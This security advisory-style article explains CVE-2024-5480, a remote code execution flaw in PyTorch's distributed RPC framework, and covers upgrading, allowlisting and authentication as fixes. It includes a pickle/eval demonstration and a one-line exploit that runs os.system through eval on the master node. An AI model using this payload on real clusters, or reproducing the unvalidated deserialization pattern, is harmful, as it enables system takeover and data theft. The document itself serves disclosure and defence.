CVE-2024-5480 - Remote Code Execution Vulnerability in PyTorch's Distributed RPC Framework

A critical vulnerability (CVE-2024-5480) has been discovered in PyTorch's torch.distributed.rpc framework, affecting versions prior to 2.2.2. It allows remote code execution (RCE) within the framework, which could lead to sensitive information leakage, system compromise, and other severe consequences.

The vulnerability arises because the framework does not verify which functions are being called during RPC (Remote Procedure Call) operations in distributed training scenarios. This article examines the root cause of the issue, the exploit details, and mitigation measures. Because this vulnerability poses a significant threat to AI developers and users, every system that uses PyTorch distributed training should be updated to a patched release.

Code Snippet

The simplified snippet below illustrates the vulnerable pattern in the affected torch.distributed.rpc framework:

import pickle

# Simplified, illustrative model of the receiving side (not PyTorch's actual source).
def _run_function(payload: bytes):
    # Deserialize the PythonUDF: the target function plus its args and kwargs.
    # pickle resolves the function by module and name, so the sender chooses it.
    func, args, kwargs = pickle.loads(payload)

    # Execute the function exactly as received
    return func(*args, **kwargs)    # <---- Lack of function validation

As the code shows, _run_function is called when a worker node sends a PythonUDF to the master node. The master node deserializes the function and executes it without checking whether it is a function it should be running. An attacker can exploit this missing validation to run arbitrary code and compromise the entire system.
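The missing validation is exploitable because torch.distributed.rpc serializes Python calls with pickle, which stores a function as a reference (its module and name) rather than as code. The standard-library sketch below, which does not use PyTorch, shows the consequence: a reference to builtins.eval deserializes into the receiver's own eval, and a receiver that calls whatever arrives runs a string chosen by the sender. run_untrusted is a hypothetical stand-in for the framework's receive path.

```python
import pickle


def run_untrusted(payload: bytes):
    """Naive receiver: deserialize (func, args, kwargs) and call func, no checks."""
    func, args, kwargs = pickle.loads(payload)
    return func(*args, **kwargs)


# Sender side: eval is pickled as the reference builtins.eval, not as code.
payload = pickle.dumps((eval, ("6 * 7",), {}))

print(b"eval" in payload)      # True: only the function's name travels
print(run_untrusted(payload))  # 42: the receiver's own eval ran the sender's string
```

Swapping the harmless "6 * 7" for a string that imports os and runs a shell command is all it takes to turn this into the RCE described in this article.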

Exploit Details

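The vulnerability can be exploited by an attacker who controls a worker node in a distributed PyTorch training setup. Instead of a legitimate function, the attacker sends an RPC whose target is a built-in such as eval(). Because Python functions are serialized by reference, the master node resolves that reference to its own eval and runs the attacker-supplied string. As an example:

import torch.distributed.rpc as rpc

# Issued from a compromised worker after rpc.init_rpc(...) has joined the group;
# assumes the master registered under the name "master". A harmless command
# stands in for the payload, but any shell command would run the same way.
rpc.rpc_sync("master", eval, args=('__import__("os").system("id")',))    # <---- Attacker-supplied arbitrary code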

An attacker leveraging this flaw can compromise the master node that initiates distributed training, potentially leading to the theft of sensitive AI-related data and further compromise of connected systems.

Original References

- PyTorch GitHub Repository (prior to the fix): https://github.com/pytorch/pytorch
- PyTorch Security Advisory (v2.2.2): https://github.com/pytorch/pytorch/security/advisories/GHSA-62rc-24x9-5f4c

Mitigation Measures

To mitigate this vulnerability, it is recommended to update the PyTorch package to version 2.2.2 or later. The patch included in the new release restricts function calls and ensures proper validation during RPC operations.
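As an illustration of the general idea of restricting function calls (not PyTorch's actual patch), the standard-library sketch below checks every function reference against an allowlist while deserializing, using the pickle.Unpickler.find_class hook that the Python documentation recommends for restricting globals. ALLOWED_GLOBALS, AllowlistUnpickler and run_validated are hypothetical names chosen for this example.

```python
import importlib
import io
import pickle

# Hypothetical allowlist: the only (module, name) globals a request may reference.
ALLOWED_GLOBALS = {("builtins", "abs"), ("builtins", "len")}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global not on the allowlist."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return getattr(importlib.import_module(module), name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def run_validated(payload: bytes):
    """Deserialize (func, args, kwargs) under the allowlist, then call func."""
    func, args, kwargs = AllowlistUnpickler(io.BytesIO(payload)).load()
    return func(*args, **kwargs)


print(run_validated(pickle.dumps((abs, (-5,), {}))))  # 5

try:
    run_validated(pickle.dumps((eval, ("6 * 7",), {})))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)  # rejected: global builtins.eval is forbidden
```

Rejecting the reference during deserialization means the forbidden function is never looked up, let alone called. The allowlist is only as safe as its entries, though: adding a general-purpose callable such as eval, exec or getattr reopens the hole.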

To update PyTorch, run the following command:

pip install --upgrade "torch>=2.2.2"
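To confirm that an environment is actually on a fixed release, the installed version can be compared against 2.2.2. The sketch below is a minimal check assuming version strings of the usual PyTorch form (for example 2.2.1+cu121); is_patched is a hypothetical helper, and for unusual version strings the packaging library's packaging.version.Version is the more robust choice.

```python
import re

MIN_FIXED = (2, 2, 2)  # first release this article lists as fixed


def is_patched(version: str) -> bool:
    """Return True if a torch version string is 2.2.2 or later.

    Only the leading major.minor.patch numbers are compared; local tags such as
    "+cu121" and pre-release suffixes are ignored (a simplification: a
    pre-release like 2.2.2rc1 is treated as 2.2.2).
    """
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    major, minor, patch = (int(part or 0) for part in match.groups())
    return (major, minor, patch) >= MIN_FIXED


try:
    import torch
    print(torch.__version__, "patched" if is_patched(torch.__version__) else "VULNERABLE")
except ImportError:
    print("torch is not installed")
```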

Additionally, developers should follow best practices for securing AI systems, such as incorporating authentication mechanisms for worker nodes and isolating vulnerable components using containerization techniques.
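One way to add authentication for worker nodes is to have every node sign its messages with a shared secret and have the receiver verify the signature before deserializing anything. The standard-library sketch below uses HMAC-SHA256; SHARED_KEY, sign and verify_and_load are hypothetical names, and this is not a built-in feature of torch.distributed.rpc. It only keeps out parties that lack the key: a compromised node that holds the key can still send a malicious payload, so it complements upgrading rather than replacing it.

```python
import hashlib
import hmac
import pickle
import secrets

# Hypothetical shared secret, distributed to trusted nodes out of band.
SHARED_KEY = secrets.token_bytes(32)
TAG_LEN = hashlib.sha256().digest_size  # 32-byte HMAC-SHA256 tag


def sign(payload: bytes, key: bytes = SHARED_KEY) -> bytes:
    """Prefix the payload with an HMAC-SHA256 tag computed over its bytes."""
    return hmac.new(key, payload, hashlib.sha256).digest() + payload


def verify_and_load(message: bytes, key: bytes = SHARED_KEY):
    """Reject unauthenticated messages before they ever reach pickle."""
    tag, payload = message[:TAG_LEN], message[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise PermissionError("message failed authentication")
    return pickle.loads(payload)


msg = sign(pickle.dumps(("gradients", [1.0, 2.0])))
print(verify_and_load(msg))  # ('gradients', [1.0, 2.0])

forged = sign(pickle.dumps(("x",)), key=secrets.token_bytes(32))
try:
    verify_and_load(forged)
except PermissionError as exc:
    print("rejected:", exc)
```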

Timeline

Published on: 06/06/2024 19:16:09 UTC
Last modified on: 06/07/2024 14:56:05 UTC